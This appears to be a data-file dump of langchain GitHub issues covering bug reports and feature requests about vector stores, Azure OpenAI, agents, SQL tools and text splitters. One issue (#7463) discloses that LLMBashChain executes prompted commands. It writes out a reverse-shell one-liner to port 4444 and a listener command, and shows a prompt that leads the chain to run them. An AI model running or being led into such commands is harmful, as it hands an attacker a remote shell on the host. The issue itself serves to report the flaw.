issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 261k ⌀ | issue_title stringlengths 1 925 | issue_comments_url stringlengths 56 81 | issue_comments_count int64 0 2.5k | issue_created_at stringlengths 20 20 | issue_updated_at stringlengths 20 20 | issue_html_url stringlengths 37 62 | issue_github_id int64 387k 2.46B | issue_number int64 1 127k |
|---|---|---|---|---|---|---|---|---|---|
[
"langchain-ai",
"langchain"
] | ### Feature request
Adapt the pinecone vectorstore to support upcoming starter tier. The changes are related to removing namespaces and `delete by metadata` feature.
### Motivation
Indexes in upcoming Pinecone V4 won't support:
* namespaces
* `configure_index()`
* delete by metadata
* `describe_index()` with metadata filtering
* `metadata_config` parameter to `create_index()`
* `delete()` with the `deleteAll` parameter
### Your contribution
I'll do it. | Pinecone: Support starter tier | https://api.github.com/repos/langchain-ai/langchain/issues/7472/comments | 6 | 2023-07-10T10:19:16Z | 2023-07-12T19:41:36Z | https://github.com/langchain-ai/langchain/issues/7472 | 1,796,444,479 | 7,472 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I want to override `google_search_url` for the `class GoogleSearchAPIWrapper `. though it is not exist yet.
https://api.python.langchain.com/en/latest/utilities/langchain.utilities.google_search.GoogleSearchAPIWrapper.html#langchain.utilities.google_search.GoogleSearchAPIWrapper
Just like BingSearchAPIWrapper can override `bing_search_url`, I hope I can also override `google_search_url`.
https://api.python.langchain.com/en/latest/utilities/langchain.utilities.bing_search.BingSearchAPIWrapper.html#langchain.utilities.bing_search.BingSearchAPIWrapper.bing_search_url
### Motivation
I want to mock google API response.
### Your contribution
I think I am not capable of. | Add google search API url | https://api.github.com/repos/langchain-ai/langchain/issues/7471/comments | 1 | 2023-07-10T09:23:14Z | 2023-10-16T16:05:24Z | https://github.com/langchain-ai/langchain/issues/7471 | 1,796,347,569 | 7,471 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain==0.0.219
Python 3.9
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
from langchain.chat_models import AzureChatOpenAI
from langchain.schema import HumanMessage
model = AzureChatOpenAI(
openai_api_base="baseurl",
openai_api_version="version",
deployment_name="name",
openai_api_key="key",
openai_api_type="type",
)
print(model(
[
HumanMessage(
content="Translate this sentence from English to French. I love programming."
)
]
))
```
I put the relevant values(relevant configuration). Still i am getting the error - **openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again.**
### Expected behavior
It should run without any error. Because I took the code from the official documentation- https://python.langchain.com/docs/modules/model_io/models/chat/integrations/azure_chat_openai | openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again. | https://api.github.com/repos/langchain-ai/langchain/issues/7470/comments | 2 | 2023-07-10T09:11:15Z | 2023-10-16T16:05:29Z | https://github.com/langchain-ai/langchain/issues/7470 | 1,796,327,821 | 7,470 |
[
"langchain-ai",
"langchain"
] | ### Feature request
starting from 1.26.1, Vertex SDK exposes chat_history explicitly.
### Motivation
currently you can't work with chat_history if you use a fresh version of Vertex SDK
### Your contribution
yes, I'll do it. | Support new chat_history for Vertex AI | https://api.github.com/repos/langchain-ai/langchain/issues/7469/comments | 1 | 2023-07-10T08:54:03Z | 2023-07-13T05:13:31Z | https://github.com/langchain-ai/langchain/issues/7469 | 1,796,298,829 | 7,469 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain 0.0.228
### Who can help?
@dev2049
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code is very similar to existing example, instead of ``` Pinecone.from_documents``` I use ```Pinecone.from_documents.from_existingindex```
```
llm = AzureChatOpenAI(
openai_api_base=OPENAI_DEPLOYMENT_ENDPOINT,
openai_api_version=OPENAI_API_VERSION ,
deployment_name=OPENAI_DEPLOYMENT_NAME,
openai_api_key=OPENAI_API_KEY,
openai_api_type = OPENAI_API_TYPE ,
model_name=OPENAI_MODEL_NAME,
temperature=0)
embed = OpenAIEmbeddings(deployment=OPENAI_EMBEDDING_DEPLOYMENT_NAME, model=OPENAI_EMBEDDING_MODEL_NAME, chunk_size=1)
user_input = get_text()
metadata_field_info = [
AttributeInfo(
name="IdentityId",
description="The id of the resident",
type="string",
),
AttributeInfo(
name="FirstName",
description="The first name of the resident",
type="string",
),
AttributeInfo(
name="LastName",
description="The last name of the resident",
type="string",
),
AttributeInfo(
name="Gender",
description="The gender of the resident",
type="string"
),
AttributeInfo(
name="Birthdate",
description="The birthdate of the resident",
type="string"
),
AttributeInfo(
name="Birthplace",
description="The birthplace of the resident",
type="string"
),
AttributeInfo(
name="Hometown",
description="The hometown of the resident",
type="string"
)
]
document_content_description = "General information about the resident for example: Phone number, Cell phone number, address, birth date, owned technologies, more about me, edication, college name, past occupations, past interests, whether is veteran or not, name of spourse, religious preferences, spoken languages, active live description, retired live description, accomplishments, marital status, anniversay date, his/her typical day, talents and hobbies, interest categories, other interest categories, favorite actor, favorite actress, etc"
llm = OpenAI(temperature=0)
vectordb = Pinecone.from_existing_index("default",embedding=embed, namespace="profiles5")
retriever = SelfQueryRetriever.from_llm(
llm, vectordb, document_content_description, metadata_field_info, verbose=True
)
qa_chain = RetrievalQA.from_chain_type(llm,retriever=retriever)
response = qa_chain.run(user_input)
st.write(response)
```
Error:
TypeError: 'NoneType' object is not callable
Traceback:
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "C:\Users\xx\repos\cnChatbotv1\app\pages\07Chat With Pinecone self-querying.py", line 151, in <module>
main()
File "C:\Users\xx\repos\cnChatbotv1\app\pages\07Chat With Pinecone self-querying.py", line 142, in main
retriever = SelfQueryRetriever.from_llm(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\retrievers\self_query\base.py", line 149, in from_llm
llm_chain = load_query_constructor_chain(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 142, in load_query_constructor_chain
prompt = _get_prompt(
^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 103, in _get_prompt
output_parser = StructuredQueryOutputParser.from_components(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\base.py", line 60, in from_components
ast_parser = get_parser(
^^^^^^^^^^^
File "C:\Users\xx\anaconda3\envs\cnChatbotv3\Lib\site-packages\langchain\chains\query_constructor\parser.py", line 148, in get_parser
transformer = QueryTransformer(
### Expected behavior
response to the query should be returned. | TypeError: 'NoneType' object is not callable in SelfQueryRetriever.from_llm | https://api.github.com/repos/langchain-ai/langchain/issues/7468/comments | 3 | 2023-07-10T08:33:10Z | 2023-07-10T13:36:01Z | https://github.com/langchain-ai/langchain/issues/7468 | 1,796,263,402 | 7,468 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I am using pgvector and hoping for an MMR retrieval method similar to qdrant implementation.
### Motivation
MMR retrieval can return more diverse results, removing duplicate rows, which meets my needs (I did some testing on qdrant). However, I couldn't find an implementation in vectorstore of type pgvector.
### Your contribution
I found that in the current implementation of the pgvector class, the retrieval results do not return the original vectors, so it is not possible to simply add MMR post-processing. Is this due to performance considerations? Have you considered adding an option for this? | pgvector add implemention of MMR | https://api.github.com/repos/langchain-ai/langchain/issues/7466/comments | 3 | 2023-07-10T08:08:26Z | 2023-11-28T16:16:39Z | https://github.com/langchain-ai/langchain/issues/7466 | 1,796,222,961 | 7,466 |
[
"langchain-ai",
"langchain"
] | ### System Info
```
LangChain version v0.0.228
Linux * 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
Python 3.9.13
```
### Who can help?
@hwchase17
@agola11
@coyotespike
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Reproduce with these steps:
1. `nv -lvp 4444` : Open your 4444 port.
2. Run the below code.
```python
from langchain.chains import LLMBashChain
from langchain.llms import OpenAI
llm = OpenAI(temperature=0)
text = "Please write a bash script that executes `bash -c 'bash -i >& /dev/tcp/0.0.0.0/4444 0>&1'`"
bash_chain = LLMBashChain.from_llm(llm, verbose=True)
bash_chain.run(text)
```
3. You can get the reverse shell code.
### Expected behavior
Bash chain is so vulnerable. I think that it should print some warning messages or block the execution. But it just execute my script. This chain is so dangerous to use in production, isn't it? | BashChain allows Remote Control Execution. | https://api.github.com/repos/langchain-ai/langchain/issues/7463/comments | 1 | 2023-07-10T06:43:43Z | 2023-10-16T16:05:34Z | https://github.com/langchain-ai/langchain/issues/7463 | 1,796,085,216 | 7,463 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain==0.0.208 python==3.10.12 linux==Ubuntu 20.04.6 LTS
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.llms import OpenAI
from langchain.chains import ConversationChain
from langchain.memory import ConversationBufferMemory
llm = OpenAI(model="text-davinci-003", temperature=0)
conversation = ConversationChain(
llm=llm,
verbose=True,
memory=ConversationBufferMemory()
)
# Start the conversation
conversation.predict(input="Tell me about yourself.")
# Continue the conversation
conversation.predict(input="What can you do?")
conversation.predict(input="How can you help me with data analysis?")
# Display the conversation
print(conversation)
### Expected behavior
OpenAI would use env variable for openai_api_key and not allow ConversationChain to leak it via memory=ConversationBufferMemory() | openai_api_key stored as string | https://api.github.com/repos/langchain-ai/langchain/issues/7462/comments | 2 | 2023-07-10T06:32:59Z | 2023-10-16T16:05:39Z | https://github.com/langchain-ai/langchain/issues/7462 | 1,796,067,285 | 7,462 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
Hello every one!
Im triying to use an LLM models to consult data from OpenTargetPlatform (theyive information about disaeses and its bond with some molecules etc). They have and endpoint which can be access using Graph QL. OpenTargetPlatform have several query structures for different kind of data requests. In the following example I give to the model 3 different query structures:
```python
from langchain import OpenAI
from langchain.agents import load_tools, initialize_agent, AgentType, Tool
from langchain.utilities import GraphQLAPIWrapper
from langchain.prompts import PromptTemplate
from langchain.chains import LLMChain
# 1.1) Promt Template (in case we need to make a prompt engineering)
prompt = PromptTemplate(
input_variables=["query"],
template="{query}"
)
# 1.2) LLM Model , in this case a LLM modelo from OpenAI
llm = OpenAI(openai_api_key="YOURKEY",
model_name="gpt-3.5-turbo", temperature=0.85)
# 1.3) Creation of the chain object (integrates the llm and the prompt template)
llm_chain = LLMChain(llm=llm, prompt=prompt)
# 2.1) We set up the LLM as a tool in order to answer general questions
llm_tool = Tool(name='Language Model',
func=llm_chain.run,
description='use this tool for general purpose queries and logic')
# 2.2) We set up the graphql tool
graph_tool = load_tools( # IMPORTANT: usamos load_tools porque ya es una herramienta interna de Langchaing
tool_names = ["graphql"],
graphql_endpoint="https://api.platform.opentargets.org/api/v4/graphql",
llm=llm)
# 2.3) List of tools that the agent will take
tools = [llm_tool, graph_tool[0]]
agent = initialize_agent(
agent="zero-shot-react-description", # Type of agent
tools=tools, # herramienta que le doy
llm=llm,
verbose=True,
max_iterations=3)
# IMPORANT: The zero shot react agent has no memory, all the answers that it will give are just for one question. It case you want to use a agent with memoory you have to use other type of agent such as Conversational React
type(agent)
prefix = "This questions are related to get medical information, specifically data from OpenTargetPlatform, " \
"If the question is about the relation among a target and a diseases use the query TargetDiseases, " \
"If the question is about the relation among diseases and targets then use the query DiseasesTargets, " \
"If the question request evidence between a disease and targets then use the query targetDiseaseEvidence"
graphql_fields = """
query TargetDiseases {
target(ensemblId: "target") {
id
approvedSymbol
associatedDiseases {
count
rows {
disease {
id
name
}
datasourceScores {
id
score
}
}
}
}
}
query DiseasesTargets {
disease(efoId: "disease") {
id
name
associatedTargets {
count
rows {
target {
id
approvedSymbol
}
score
}
}
}
}
query targetDiseaseEvidence {
disease(efoId: "disease") {
id
name
evidences(datasourceIds: ["intogen"], ensemblIds: ["target"]) {
count
rows {
disease {
id
name
}
diseaseFromSource
target {
id
approvedSymbol
}
mutatedSamples {
functionalConsequence {
id
label
}
numberSamplesTested
numberMutatedSamples
}
resourceScore
significantDriverMethods
cohortId
cohortShortName
cohortDescription
}
}
}
}
"""
suffix = "What are the targets of vorinostat?"
#answer= agent.run(prefix+ suffix + graphql_fields)
answer= agent.run(suffix + prefix+ graphql_fields)
answer
```
When I have 2 structures of queries it works well. However, when I add the thid like in this examples different kinf of errors start to show.
Any recomentation about this? shoul I separete the query structure? or the order of elements is wrong in my agent ?
I would apreciate so much your help !
Orlando
### Suggestion:
_No response_ | Help using GraphQL tool | https://api.github.com/repos/langchain-ai/langchain/issues/7459/comments | 1 | 2023-07-10T05:22:54Z | 2023-10-16T16:05:45Z | https://github.com/langchain-ai/langchain/issues/7459 | 1,795,972,865 | 7,459 |
[
"langchain-ai",
"langchain"
] | Hi there,
I am new to langchain and I encountered some problems when import `langchain.agents`.
I run `main.py` as follows:
```python
# main.py
# python main.py
import os
os.environ["OPENAI_API_KEY"]="my key"
import langchain.agents
```
Some errors occur:
```
Traceback (most recent call last):
File "F:\LLM_publichousing\me\main.py", line 6, in <module>
import langchain.agents
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\__init__.py", line 6, in <module>
from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\__init__.py", line 2, in <module>
from langchain.agents.agent import (
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\agent.py", line 16, in <module>
from langchain.agents.tools import InvalidTool
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\agents\tools.py", line 8, in <module>
from langchain.tools.base import BaseTool, Tool, tool
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\tools\__init__.py", line 3, in <module>
from langchain.tools.arxiv.tool import ArxivQueryRun
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\tools\arxiv\tool.py", line 12, in <module>
from langchain.utilities.arxiv import ArxivAPIWrapper
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\utilities\__init__.py", line 3, in <module>
from langchain.utilities.apify import ApifyWrapper
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\utilities\apify.py", line 5, in <module>
from langchain.document_loaders import ApifyDatasetLoader
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\document_loaders\__init__.py", line 54, in <module>
from langchain.document_loaders.github import GitHubIssuesLoader
File "C:\ProgramData\Anaconda3\envs\ly\lib\site-packages\langchain\document_loaders\github.py", line 37, in <module>
class GitHubIssuesLoader(BaseGitHubLoader):
File "pydantic\main.py", line 197, in pydantic.main.ModelMetaclass.__new__
File "pydantic\fields.py", line 506, in pydantic.fields.ModelField.infer
File "pydantic\fields.py", line 436, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 552, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 663, in pydantic.fields.ModelField._type_analysis
File "pydantic\fields.py", line 808, in pydantic.fields.ModelField._create_sub_type
File "pydantic\fields.py", line 436, in pydantic.fields.ModelField.__init__
File "pydantic\fields.py", line 552, in pydantic.fields.ModelField.prepare
File "pydantic\fields.py", line 668, in pydantic.fields.ModelField._type_analysis
File "C:\ProgramData\Anaconda3\envs\ly\lib\typing.py", line 852, in __subclasscheck__
return issubclass(cls, self.__origin__)
TypeError: issubclass() arg 1 must be a class
```
The langchain version is `0.0.228`
My system is Windows 10. | Error occurs when `import langchain.agents` | https://api.github.com/repos/langchain-ai/langchain/issues/7458/comments | 6 | 2023-07-10T04:43:44Z | 2023-10-21T16:07:20Z | https://github.com/langchain-ai/langchain/issues/7458 | 1,795,933,159 | 7,458 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain 0.0.228
python 3.11.1
LLM: self hosting llm using [text-generation-inference](https://github.com/huggingface/text-generation-inference)
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
There is a Sample Input in the description for `InfoSQLDatabaseTool` ([this line](https://github.com/hwchase17/langchain/blob/560c4dfc98287da1bc0cfc1caebbe86d1e66a94d/langchain/agents/agent_toolkits/sql/toolkit.py#L48C18-L48C18)), and the Sample Input quotes all table names in a pair of single quotes, which will mislead the llm to also quote Action Input in single quotes.
An example of the LLM behaviour:
```console
$ agent_executor.run("According to the titanic table, how many people survived?")
> Entering new chain...
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The titanic table seems relevant, I should query the schema for it.
Action: sql_db_schema
Action Input: 'titanic'
Observation: Error: table_names {"'titanic'"} not found in database
Thought:I should list all the tables in the database first.
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The titanic table is in the database, I should query the schema for it.
Action: sql_db_schema
Action Input: 'titanic'
Observation: Error: table_names {"'titanic'"} not found in database
```
And this example is more clear (note the Action Input):
```console
$ agent_executor.run("When is the last dataset created?")
> Entering new chain...
Action: sql_db_list_tables
Action Input:
Observation: aix_role, aix_user, chat, client_info, dataset, dataset_version, oauth2_authorization, oauth2_authorization_consent, oauth2_registered_client, titanic, user_role
Thought:The 'dataset' and 'dataset_version' tables seem relevant. I should query the schema for these tables.
Action: sql_db_schema
Action Input: 'dataset, dataset_version'
Observation: Error: table_names {"dataset_version'", "'dataset"} not found in database
```
After removing the quotes around the Example Input the SQL Agent works fine now.
### Expected behavior
The Action Input of `InfoSQLDatabaseTool` should be a list of table names, not a quoted str. | The single quote in Example Input of SQLDatabaseToolkit will mislead LLM | https://api.github.com/repos/langchain-ai/langchain/issues/7457/comments | 16 | 2023-07-10T04:17:49Z | 2024-02-14T16:13:03Z | https://github.com/langchain-ai/langchain/issues/7457 | 1,795,907,276 | 7,457 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain==0.0.195
python==3.9.17
system-info==ubuntu
### Who can help?
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
Copy paste this code:
```
async def csv_qa(question):
agent = create_csv_agent(OpenAI(temperature=0),
'path_to_csv',
verbose=True)
answer = await agent.arun(question)
return answer
response = await csv_qa("question_about_csv")
```
### Expected behavior
Will return the same response as using `run`:
```
def csv_qa(question):
agent = create_csv_agent(OpenAI(temperature=0),
'path_to_csv',
verbose=True)
answer = agent.run(question)
return answer
response = csv_qa("question_about_csv")
``` | Getting ` NotImplementedError: PythonReplTool does not support async` when trying to use `arun` on CSV agent | https://api.github.com/repos/langchain-ai/langchain/issues/7455/comments | 3 | 2023-07-10T02:48:11Z | 2024-02-14T16:13:08Z | https://github.com/langchain-ai/langchain/issues/7455 | 1,795,819,951 | 7,455 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain: 0.0.208
platform: win 10
python: 3.9.
The warning message is :
'Created a chunk of size 374, which is longer than the specified 100'.
### Who can help?
@hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
**Step1: run the code snippets below:**
from langchain.document_loaders import TextLoader
from langchain.text_splitter import CharacterTextSplitter
text = '''
Google opens up its AI language model PaLM to challenge OpenAI and GPT-3
Google is offering developers access to one of its most advanced AI language models: PaLM.
The search giant is launching an API for PaLM alongside a number of AI enterprise tools
it says will help businesses “generate text, images, code, videos, audio, and more from
simple natural language prompts.”
PaLM is a large language model, or LLM, similar to the GPT series created by OpenAI or
Meta’s LLaMA family of models. Google first announced PaLM in April 2022. Like other LLMs,
PaLM is a flexible system that can potentially carry out all sorts of text generation and
editing tasks. You could train PaLM to be a conversational chatbot like ChatGPT, for
example, or you could use it for tasks like summarizing text or even writing code.
(It’s similar to features Google also announced today for its Workspace apps like Google
Docs and Gmail.)'''
with open('test.txt','w') as f:
f.write(text)
#
loader = TextLoader('test.txt')
docs_from_file = loader.load()
print(docs_from_file)
text_splitter1 = CharacterTextSplitter(chunk_size=100,chunk_overlap=20)
docs = text_splitter1.split_documents(docs_from_file)
print(docs)
print(len(docs))
Step 2: then it cannot split the text as expected
### Expected behavior
It should split the doc as expected size as chunk_size. | 'chunk_size' doesnt work on 'split_documents' function | https://api.github.com/repos/langchain-ai/langchain/issues/7452/comments | 2 | 2023-07-10T00:33:09Z | 2023-07-13T00:41:21Z | https://github.com/langchain-ai/langchain/issues/7452 | 1,795,665,180 | 7,452 |
[
"langchain-ai",
"langchain"
] | Adding a unit test for any experimental module in the standard location, such as `tests/unit_tests/experimental/test_baby_agi.py`, leads to this failing unit test:
```python
../tests/unit_tests/output_parsers/test_base_output_parser.py ...................................F
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> traceback >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
def test_all_subclasses_implement_unique_type() -> None:
types = defaultdict(list)
for cls in _NON_ABSTRACT_PARSERS:
try:
types[cls._type].append(cls.__name__)
except NotImplementedError:
# This is handled in the previous test
pass
dups = {t: names for t, names in types.items() if len(names) > 1}
> assert not dups, f"Duplicate types: {dups}"
E AssertionError: Duplicate types: {<property object at 0xffff9126e7f0>: ['EnumOutputParser', 'AutoGPTOutputParser', 'NoOutputParser', 'StructuredQueryOutputParser', 'PlanningOutputParser'], <property object at 0xffff7f331710>: ['PydanticOutputParser', 'LineListOutputParser']}
E assert not {<property object at 0xffff9126e7f0>: ['EnumOutputParser', 'AutoGPTOutputParser', 'NoOutputParser', 'StructuredQueryOu...arser', 'PlanningOutputParser'], <property object at 0xffff7f331710>: ['PydanticOutputParser', 'LineListOutputParser']}
../tests/unit_tests/output_parsers/test_base_output_parser.py:55: AssertionError
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> entering PDB >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PDB post_mortem >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
> /workspaces/tests/unit_tests/output_parsers/test_base_output_parser.py(55)test_all_subclasses_implement_unique_type()
-> assert not dups, f"Duplicate types: {dups}"
```
[Repro is here](https://github.com/borisdev/langchain/pull/12) and [artifact here](https://github.com/borisdev/langchain/actions/runs/5502599425/jobs/10026958854?pr=12).
| Issue: Unable to add a unit test for experimental modules | https://api.github.com/repos/langchain-ai/langchain/issues/7451/comments | 5 | 2023-07-10T00:09:26Z | 2023-10-10T17:06:29Z | https://github.com/langchain-ai/langchain/issues/7451 | 1,795,646,919 | 7,451 |
[
"langchain-ai",
"langchain"
] | ### System Info
lanchain: latest, python 3.10.10
This script writes the content to the file initially, but there is a flawed step when closing the file. I've extracted this log to show the issue. For some reason, the agent thinks that if it submits an empty text input with append set to false, the previous contents will remain, but this is a false assumption. The agent should set `append:true` to ensure the file contents are preserved. The result is that the file is written with the contents and then the contents are deleted during this step.
Observation: File written successfully to hello.txt.
Thought:Since the previous steps indicate that the haiku has already been written to the file "hello.txt", the next step is to close the file. To do that, I can use the `write_file` tool with an empty text input and the `append` parameter set to `false`. This will ensure that the file is closed without making any changes to its contents.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "",
"append": false
}
}
```
Observation: File written successfully to hello.txt.
Thought:The file "hello.txt" has been successfully closed.
> Finished chain.
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Code:
```
from dotenv import find_dotenv, load_dotenv
import os
from langchain.chat_models import ChatOpenAI
from langchain.experimental.plan_and_execute import PlanAndExecute, load_agent_executor, load_chat_planner
from langchain.agents.tools import Tool
from helpers import project_root
from langchain.agents.agent_toolkits import FileManagementToolkit
from tempfile import TemporaryDirectory
load_dotenv(find_dotenv())
OPENAI_API_KEY = os.environ["OPENAI_API_KEY"]
model=ChatOpenAI(temperature=0, model="gpt-3.5-turbo")
tools = FileManagementToolkit(
root_dir=str(project_root('scratch')),
selected_tools=["read_file", "write_file", "list_directory"]).get_tools()
read_tool, write_tool, list_tool = tools
planner = load_chat_planner(model)
executor = load_agent_executor(model, tools, verbose=True)
agent = PlanAndExecute(planner=planner, executor=executor, verbose=True)
agent.run("Write a short haiku about the ocean and save it to file 'hello.txt'")
```
Output:
> Entering new chain...
steps=[Step(value='Create a string variable to store the haiku about the ocean.'), Step(value="Open a file named 'hello.txt' in write mode."), Step(value='Write the haiku to the file.'), Step(value='Close the file.'), Step(value="Given the above steps taken, respond to the user's original question.\n\n")]
> Entering new chain...
Action:
```
{
"action": "Final Answer",
"action_input": "ocean_haiku = 'Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines'"
}
```
> Finished chain.
*****
Step: Create a string variable to store the haiku about the ocean.
Response: ocean_haiku = 'Waves crash on the shore
Seagulls soar in the blue sky
Ocean's beauty shines'
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": ""
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the file was successfully opened in write mode, I can now proceed to write the haiku about the ocean to the file.
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines"
}
}
```
Observation: File written successfully to hello.txt.
Thought:The haiku about the ocean has been successfully written to the file "hello.txt". I can now proceed to the next step.
> Finished chain.
*****
Step: Open a file named 'hello.txt' in write mode.
Response: The haiku about the ocean has been successfully written to the file "hello.txt". I can now proceed to the next step.
> Entering new chain...
Action:
```
{
"action": "write_file",
"action_input": {
"file_path": "hello.txt",
"text": "Waves crash on the shore\nSeagulls soar in the blue sky\nOcean's beauty shines",
"append": true
}
}
```
Observation: File written successfully to hello.txt.
Thought:Since the haiku has already been written to the file "hello.txt", I can proceed to the next step.
> Finished chain.
*****
Step: Write the haiku to the file.
